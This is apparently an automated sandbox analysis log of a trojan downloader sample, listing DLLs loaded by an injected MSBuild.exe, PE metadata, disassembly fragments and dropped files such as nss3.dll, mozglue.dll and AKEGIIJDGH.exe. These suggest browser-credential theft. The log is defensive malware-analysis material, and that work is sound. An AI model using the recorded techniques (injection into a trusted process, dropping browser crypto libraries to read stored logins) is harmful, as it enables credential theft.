Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\AKEGIIJDGH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000002.00000002.2537914757.0000000020A2A000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000002.00000002.2549762853.00000000387EE000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000002.00000002.2543985847.000000002C902000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000002.00000002.2563924208.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000002.00000002.2552365776.000000003E75F000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000002.00000002.2541104928.0000000026993000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2563025623.000000006CA4D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000002.00000002.2533391221.000000001A653000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000002.00000002.2537554205.00000000205C8000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.2.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000002.00000002.2546767035.000000003287B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.2.dr, softokn3.dll.2.dr

Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00418ADE GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00418ADE

Source: sql[1].dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x263795
Source: AKEGIIJDGH.exe.2.dr	Static PE information: real checksum: 0x97d7e should be: 0x99065
Source: a43486128347[1].exe.2.dr	Static PE information: real checksum: 0x97d7e should be: 0x99065
Source: SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Static PE information: real checksum: 0x95b73 should be: 0x96e5a

Source: sql[1].dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C420FE push eax; ret	0_2_00C426C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9E1C2 push ecx; ret	0_2_00C9E1D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9E5EE push 800003C3h; ret	0_2_00C9E5F5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9E582 push cs; retn 0003h	0_2_00C9E5A5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C9E66C push cs; retf 0003h	0_2_00C9E66D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C4884E push ecx; ret	0_2_00C48861
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00CA0C05 push 0000004Ch; iretd	0_2_00CA0C16
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe	Code function: 0_2_00C8CE35 push ecx; ret	0_2_00C8CE48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0042F2D2 push ecx; ret	2_2_0042F2E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00422EC9 push esi; ret	2_2_00422ECB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0041DF45 push ecx; ret	2_2_0041DF58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_00432715 push 0000004Ch; iretd	2_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_6CA0B536 push ecx; ret	2_2_6CA0B549
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D20FE push eax; ret	11_2_000D26C2
Source: C:\ProgramData\AKEGIIJDGH.exe	Code function: 11_2_000D884E push ecx; ret	11_2_000D8861

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\AKEGIIJDGH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\a43486128347[1].exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\AKEGIIJDGH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

2_2_00418ADE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
